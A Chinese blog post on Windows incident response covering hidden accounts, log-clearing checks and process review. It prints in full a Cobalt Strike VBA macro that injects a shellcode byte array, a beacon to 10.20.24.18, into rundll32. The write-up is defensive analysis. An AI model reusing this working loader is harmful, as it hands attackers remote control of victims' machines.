菜狗windows应急响应上

F0re4t   ·   发表于 2023-01-09 16:48:41   ·   技术文章

入侵排查

1.账号安全

  1. net user

查看是否有异常用户

未发现异常,那么接下来考虑隐藏账户或者克隆账号

发现隐藏账号

  1. wmic useraccount get name,sid

发现一个隐藏账号attack,还好不是克隆,不然还得翻注册表

检查异常网络连接-无

  1. netstat -ano

全是开启监听,并无交互。

暂时放一边,从别的地方入手看看。

日志分析

排查是否有清除过日志

手动常规清除-无

先查看是否有1102清除日志的记录产生

使用msf清除指定日志-无

使用msf清除指定日志的话,会在系统日志留下102类型的日志

使用cs清除日志-无

无日志操作记录,但是日志服务会关闭,需要手动重启。这里并没有。

修改注册表清除-无

这时需要打开注册表排查这个路径下\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control是否多了MiniNT选项。


得出结论:

1.入侵者未清除日志

2.使用msf清除所有日志,这时没有操作记录留下,日志也不会关闭。

待分析后确认猜想。

创建用户日志分析

既然发现了隐藏账户attck$,那么首先来分析创建时间,初步判断入侵时间。

创建attck$安z账户时会产生4720-创建用户日志和4722-启用用户日志两种日志。

然而令我很失望的是,这两种日志都没有结果,那么很大概率可以判断是使用msf清除所有日志或者我不了解的手段清除了痕迹。既然这样日志上可能分析不出来什么东西了,换一个思路

进程分析

查看是否有可疑的进程

  1. wmic process get commandline,executablepath,executionstate,name,priority,processid,parentprocessid /formate:list

很多,复制下来慢慢看

  1. CommandLine=C:\Windows\system32\svchost.exe -k DcomLaunch
  2. ExecutablePath=C:\Windows\system32\svchost.exe
  3. ExecutionState=
  4. Name=svchost.exe
  5. ParentProcessId=608
  6. Priority=8
  7. ProcessId=804
  8. CommandLine="C:\Program Files\VMware\VMware Tools\vmacthlp.exe"
  9. ExecutablePath=C:\Program Files\VMware\VMware Tools\vmacthlp.exe
  10. ExecutionState=
  11. Name=vmacthlp.exe
  12. ParentProcessId=608
  13. Priority=8
  14. ProcessId=848
  15. CommandLine=C:\Windows\system32\svchost.exe -k rpcss
  16. ExecutablePath=C:\Windows\system32\svchost.exe
  17. ExecutionState=
  18. Name=svchost.exe
  19. ParentProcessId=608
  20. Priority=8
  21. ProcessId=880
  22. CommandLine=C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  23. ExecutablePath=C:\Windows\System32\svchost.exe
  24. ExecutionState=
  25. Name=svchost.exe
  26. ParentProcessId=608
  27. Priority=8
  28. ProcessId=916
  29. CommandLine=C:\Windows\system32\svchost.exe -k GPSvcGroup
  30. ExecutablePath=C:\Windows\system32\svchost.exe
  31. ExecutionState=
  32. Name=svchost.exe
  33. ParentProcessId=608
  34. Priority=8
  35. ProcessId=1004
  36. CommandLine=C:\Windows\system32\svchost.exe -k netsvcs
  37. ExecutablePath=C:\Windows\system32\svchost.exe
  38. ExecutionState=
  39. Name=svchost.exe
  40. ParentProcessId=608
  41. Priority=8
  42. ProcessId=220
  43. CommandLine=C:\Windows\system32\SLsvc.exe
  44. ExecutablePath=C:\Windows\system32\SLsvc.exe
  45. ExecutionState=
  46. Name=SLsvc.exe
  47. ParentProcessId=608
  48. Priority=8
  49. ProcessId=304
  50. CommandLine=C:\Windows\system32\svchost.exe -k LocalService
  51. ExecutablePath=C:\Windows\system32\svchost.exe
  52. ExecutionState=
  53. Name=svchost.exe
  54. ParentProcessId=608
  55. Priority=8
  56. ProcessId=448
  57. CommandLine=C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  58. ExecutablePath=C:\Windows\System32\svchost.exe
  59. ExecutionState=
  60. Name=svchost.exe
  61. ParentProcessId=608
  62. Priority=8
  63. ProcessId=736
  64. CommandLine=C:\Windows\system32\svchost.exe -k NetworkService
  65. ExecutablePath=C:\Windows\system32\svchost.exe
  66. ExecutionState=
  67. Name=svchost.exe
  68. ParentProcessId=608
  69. Priority=8
  70. ProcessId=344
  71. CommandLine=C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  72. ExecutablePath=C:\Windows\system32\svchost.exe
  73. ExecutionState=
  74. Name=svchost.exe
  75. ParentProcessId=608
  76. Priority=8
  77. ProcessId=1132
  78. CommandLine=taskeng.exe {C1AD95CB-CEA5-43D4-8072-C2E0817CD62D}
  79. ExecutablePath=C:\Windows\system32\taskeng.exe
  80. ExecutionState=
  81. Name=taskeng.exe
  82. ParentProcessId=220
  83. Priority=6
  84. ProcessId=1140
  85. CommandLine=C:\Windows\System32\spoolsv.exe
  86. ExecutablePath=C:\Windows\System32\spoolsv.exe
  87. ExecutionState=
  88. Name=spoolsv.exe
  89. ParentProcessId=608
  90. Priority=8
  91. ProcessId=1316
  92. CommandLine="C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICT
  93. UPDATE.EXE"
  94. ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDI
  95. CTUPDATE.EXE
  96. ExecutionState=
  97. Name=IMEDICTUPDATE.EXE
  98. ParentProcessId=608
  99. Priority=8
  100. ProcessId=1368
  101. CommandLine=taskeng.exe {36687750-3988-46D1-BC9B-560C2F7A36BA}
  102. ExecutablePath=C:\Windows\system32\taskeng.exe
  103. ExecutionState=
  104. Name=taskeng.exe
  105. ParentProcessId=220
  106. Priority=8
  107. ProcessId=1604
  108. CommandLine="C:\Windows\system32\Dwm.exe"
  109. ExecutablePath=C:\Windows\system32\Dwm.exe
  110. ExecutionState=
  111. Name=dwm.exe
  112. ParentProcessId=736
  113. Priority=8
  114. ProcessId=1652
  115. CommandLine=C:\Windows\Explorer.EXE
  116. ExecutablePath=C:\Windows\Explorer.EXE
  117. ExecutionState=
  118. Name=explorer.exe
  119. ParentProcessId=1620
  120. Priority=8
  121. ProcessId=1792
  122. CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
  123. ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  124. ExecutionState=
  125. Name=vmtoolsd.exe
  126. ParentProcessId=1792
  127. Priority=8
  128. ProcessId=1912
  129. CommandLine=C:\Windows\system32\conime.exe
  130. ExecutablePath=C:\Windows\system32\conime.exe
  131. ExecutionState=
  132. Name=conime.exe
  133. ParentProcessId=1780
  134. Priority=8
  135. ProcessId=1804
  136. CommandLine=C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
  137. ExecutablePath=C:\Windows\system32\svchost.exe
  138. ExecutionState=
  139. Name=svchost.exe
  140. ParentProcessId=608
  141. Priority=8
  142. ProcessId=1860
  143. CommandLine=C:\Windows\system32\svchost.exe -k regsvc
  144. ExecutablePath=C:\Windows\system32\svchost.exe
  145. ExecutionState=
  146. Name=svchost.exe
  147. ParentProcessId=608
  148. Priority=8
  149. ProcessId=1928
  150. CommandLine="C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.ex
  151. e"
  152. ExecutablePath=C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.
  153. exe
  154. ExecutionState=
  155. Name=VGAuthService.exe
  156. ParentProcessId=608
  157. Priority=8
  158. ProcessId=1964
  159. CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
  160. ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  161. ExecutionState=
  162. Name=vmtoolsd.exe
  163. ParentProcessId=608
  164. Priority=13
  165. ProcessId=1572
  166. CommandLine=C:\Windows\System32\svchost.exe -k WerSvcGroup
  167. ExecutablePath=C:\Windows\System32\svchost.exe
  168. ExecutionState=
  169. Name=svchost.exe
  170. ParentProcessId=608
  171. Priority=8
  172. ProcessId=2008
  173. CommandLine="C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtec
  174. tionPlatform\OSPPSVC.EXE"
  175. ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProt
  176. ectionPlatform\OSPPSVC.EXE
  177. ExecutionState=
  178. Name=OSPPSVC.EXE
  179. ParentProcessId=608
  180. Priority=8
  181. ProcessId=1580
  182. CommandLine=C:\Windows\system32\wbem\wmiprvse.exe
  183. ExecutablePath=C:\Windows\system32\wbem\wmiprvse.exe
  184. ExecutionState=
  185. Name=WmiPrvSE.exe
  186. ParentProcessId=804
  187. Priority=8
  188. ProcessId=2172
  189. CommandLine=C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-
  190. 00805FC79235}
  191. ExecutablePath=C:\Windows\system32\dllhost.exe
  192. ExecutionState=
  193. Name=dllhost.exe
  194. ParentProcessId=608
  195. Priority=8
  196. ProcessId=2436
  197. CommandLine=C:\Windows\System32\msdtc.exe
  198. ExecutablePath=C:\Windows\System32\msdtc.exe
  199. ExecutionState=
  200. Name=msdtc.exe
  201. ParentProcessId=608
  202. Priority=8
  203. ProcessId=2548
  204. CommandLine="C:\Windows\system32\wuauclt.exe"
  205. ExecutablePath=C:\Windows\system32\wuauclt.exe
  206. ExecutionState=
  207. Name=wuauclt.exe
  208. ParentProcessId=220
  209. Priority=8
  210. ProcessId=2632
  211. CommandLine="C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
  212. ExecutablePath=C:\Windows\system32\mmc.exe
  213. ExecutionState=
  214. Name=mmc.exe
  215. ParentProcessId=1612
  216. Priority=8
  217. ProcessId=2740
  218. CommandLine="C:\Windows\system32\cmd.exe"
  219. ExecutablePath=C:\Windows\system32\cmd.exe
  220. ExecutionState=
  221. Name=cmd.exe
  222. ParentProcessId=1792
  223. Priority=8
  224. ProcessId=2212
  225. CommandLine=wmic process get commandline,executablepath,executionstate,name,pri
  226. ority,processid,parentprocessid /format:list
  227. ExecutablePath=C:\Windows\System32\Wbem\WMIC.exe
  228. ExecutionState=
  229. Name=WMIC.exe
  230. ParentProcessId=2212
  231. Priority=8
  232. ProcessId=2168
  233. C:\Users\Administrator>a

这你妹的我拿眼睛怎么看得出来东西

咋办呢,手工整不动了,上工具!

传入procexp

好家伙

思维固化!!!!

应急思维过于固化,想着上来按照经验套路走,导致浪费了很多时间。

就在我走头无路之时发现??桌面已经有两个文件了?!

而且别人提示的这么明显,

第一:启用了宏的文档

第二:Foxmail

这不就是明摆着告诉你邮件钓鱼+宏病毒上线了嘛。

真的没有比你再嚣张的黑客也没有比我再蠢的应急工程师了。。。。" class="reference-link">真的没有比你再嚣张的黑客也没有比我再蠢的应急工程师了。。。。

那么初步确定,钓鱼邮件+CS宏病毒上线。

当我点击了带有cs宏病毒的文档后再次查看连接

依旧没有发现心跳包,不知道是因为时间太久被放弃了还是什么原因。

恶意样本分析

查看宏病毒

  1. Private Type PROCESS_INFORMATION
  2. hProcess As Long
  3. hThread As Long
  4. dwProcessId As Long
  5. dwThreadId As Long
  6. End Type
  7. Private Type STARTUPINFO
  8. cb As Long
  9. lpReserved As String
  10. lpDesktop As String
  11. lpTitle As String
  12. dwX As Long
  13. dwY As Long
  14. dwXSize As Long
  15. dwYSize As Long
  16. dwXCountChars As Long
  17. dwYCountChars As Long
  18. dwFillAttribute As Long
  19. dwFlags As Long
  20. wShowWindow As Integer
  21. cbReserved2 As Integer
  22. lpReserved2 As Long
  23. hStdInput As Long
  24. hStdOutput As Long
  25. hStdError As Long
  26. End Type
  27. #If VBA7 Then
  28. Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
  29. Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
  30. Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
  31. Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  32. #Else
  33. Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
  34. Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
  35. Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
  36. Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  37. #End If
  38. Sub Auto_Open()
  39. Dim myByte As Long, myArray As Variant, offset As Long
  40. Dim pInfo As PROCESS_INFORMATION
  41. Dim sInfo As STARTUPINFO
  42. Dim sNull As String
  43. Dim sProc As String
  44. #If VBA7 Then
  45. Dim rwxpage As LongPtr, res As LongPtr
  46. #Else
  47. Dim rwxpage As Long, res As Long
  48. #End If
  49. myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _
  50. 13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _
  51. -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _
  52. -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _
  53. -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 64, 31, 0, 0, 83, 80, 104, 87, -119, -97, _
  54. -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _
  55. 104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _
  56. -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _
  57. -1, -1, 47, 57, 69, 117, 105, 0, 50, -17, 48, -30, -20, 49, -42, 91, -113, -15, -38, 25, 103, -98, 68, -2, -55, -82, -23, -73, 0, 122, -72, 48, 65, 102, -105, -53, -89, 61, -64, -25, _
  58. -66, -15, -78, 2, 60, 114, -62, 84, -93, 39, 111, -93, 15, -51, 36, -64, 92, 74, -18, 50, 48, -90, -115, -28, -28, -24, -57, -22, -59, 15, -104, 48, -105, -69, -34, -14, -108, -36, -118, -102, _
  59. -78, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _
  60. 83, 73, 69, 32, 57, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, _
  61. 53, 46, 48, 59, 32, 66, 79, 73, 69, 57, 59, 69, 78, 85, 83, 83, 69, 77, 41, 13, 10, 0, -31, 98, -128, 117, -15, -11, 37, 50, -90, -79, 12, -110, 87, -11, 72, 29, -15, 99, _
  62. -43, -2, -75, 115, -57, -116, 54, -15, -4, 87, -87, 115, 7, -75, 97, -90, 77, -97, 94, 111, -60, 116, -57, -81, 24, -52, -128, 66, 80, 55, -33, 2, 81, 94, 105, 7, -26, -55, 122, -70, _
  63. -40, -47, -47, 81, -121, 73, -18, 53, 1, -13, 120, -76, 28, -73, 100, -12, 85, 77, 66, 16, 91, -51, 17, -70, 115, -10, -24, -32, -113, -38, -119, 108, -46, 116, -89, -109, -93, 61, -118, 51, _
  64. -19, -85, 27, -101, -47, -123, -85, -78, -76, -81, -34, -71, 127, 123, -66, -38, -34, 70, -101, 102, 61, -47, -27, -29, -67, 112, -4, -58, 86, -21, 95, 53, 10, 75, 1, 67, 111, 107, -11, -108, _
  65. 5, 57, -15, -47, -58, -104, 29, -111, -13, 35, 106, -67, -47, -36, -36, -20, -26, 119, -17, -87, -23, 5, -24, 79, -74, -70, 65, 85, 65, -88, 22, -44, -9, 33, -21, 60, 52, 64, -82, 85, _
  66. 26, 23, 90, 69, 15, 53, -85, -70, -108, -122, 60, 12, 10, 10, -55, 89, -46, 109, -32, -53, -76, -13, 52, -96, -44, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _
  67. 104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _
  68. -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 48, 46, 50, 48, 46, 50, 52, 46, 49, 56, 0, 18, 52, 86, 120)
  69. If Len(Environ("ProgramW6432")) > 0 Then
  70. sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
  71. Else
  72. sProc = Environ("windir") & "\\System32\\rundll32.exe"
  73. End If
  74. res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
  75. rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
  76. For offset = LBound(myArray) To UBound(myArray)
  77. myByte = myArray(offset)
  78. res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
  79. Next offset
  80. res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
  81. End Sub

可以看到这是一段简单的cs直接生成VBA的宏病毒,并未使用加密混淆等免杀手段。

简单分析

  1. //调用windows的api:KERNEL32.dll做了四个事情
  2. 1.//CreateRemoteThread创建线程
  3. Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
  4. 2.//VirtualAllocEx申请内存,类似c++的virtualalloc或者virtualprotect
  5. Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
  6. 3.//WriteProcessMemory写进程内存
  7. Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
  8. 4.//创建进程CreateProcessA
  9. Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  10. //之后就是往内存中放入shellcode,shellcode就是myarray里面那一坨
  11. 简单分析:
  12. //首先使用 if 语句来确定系统是 32 位还是 64 位。 如果系统是 64 位,则将变量 sProc 设置为 rundll32.exe 的位置,该位置为 "windir"(Windows 目录)加上 "\SysWOW64\rundll32.exe";如果系统是 32 位,则将变量 sProc 设置为 "windir" 加上 "\System32\rundll32.exe"。
  13. If Len(Environ("ProgramW6432")) > 0 Then
  14. sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
  15. Else
  16. sProc = Environ("windir") & "\\System32\\rundll32.exe"
  17. End If
  18. //接下来,调用 RunStuff 函数来启动 rundll32.exe 进程。 该函数的参数包括要运行的进程的路径(在此情况下为 sProc)以及其他选项,例如启动方式(ByVal 0&)和窗口状态(ByVal 1&)。
  19. res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
  20. //然后,调用 AllocStuff 函数分配进程地址空间中的内存。 该函数的参数包括要分配内存的进程(pInfo.hProcess),要分配的内存数(UBound(myArray)),内存保护(&H1000,表示可读写)和内存分配类型(&H40,表示内存可执行)。
  21. rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
  22. //然后,使用 for 循环遍历 myArray 数组,并使用 WriteStuff 函数将数组的每个元素写入分配的内存。 WriteStuff 函数的参数包括要写入的进程(pInfo.hProcess),内存地址(rwxpage + offset),要写入的数据(myByte)和数据大小(1)。
  23. For offset = LBound(myArray) To UBound(myArray)
  24. myByte = myArray(offset)
  25. res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)

总的来说宏病毒也是shellcodeloader的一种,和c++写shellcodeloader的那一套很像,virtualalloc、RTLmove/copymemory、CreateThread这样。

思路都差不多就是要先搞到一段可读可写可执行的内存,把你的shellcode丢进去,创建线程,完事。

可以看到一点开文档,任务管理器中就会看到被启用的rundll32

宏代码中并没有其他的dll注入,写定时任务等操作,仅是起到了一个简单shellcodeloader的作用,用于上线攻击者的cs服务器。至此样本分析结束。

### ### 接下来的常规操作就是删除钓鱼文档,删除创建的隐藏用户,排查是否有其他后门就结案了。

但是总觉得还有太多没有理清让我疑惑的地方了

1.cs上线之后攻击者真的没有使用cs对其进行持久化操作吗?

2.攻击者的入侵痕迹真的是我所想的钓鱼邮件+宏病毒上线cs这么简单吗?

为什么收件人是已经是attack$?是否是攻击者通过别的方式入侵,创建attack这个账户,然后自己下载的邮箱接受钓鱼邮件上线的cs呢?

3.既然创建了隐藏账户,为什么没有留下4720和4722日志,如果是cs清除的日志,为什么日志服务没有异常关闭?

敬请收看windows应急下(如果本菜鸡还能发现点啥踪迹分析出来的话)

用户名金币积分时间理由
Track-聂风 100.00 0 2023-03-08 15:03:58 加油

打赏我,让我更有动力~

0 Reply   |  Until 2023-1-9 | 782 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.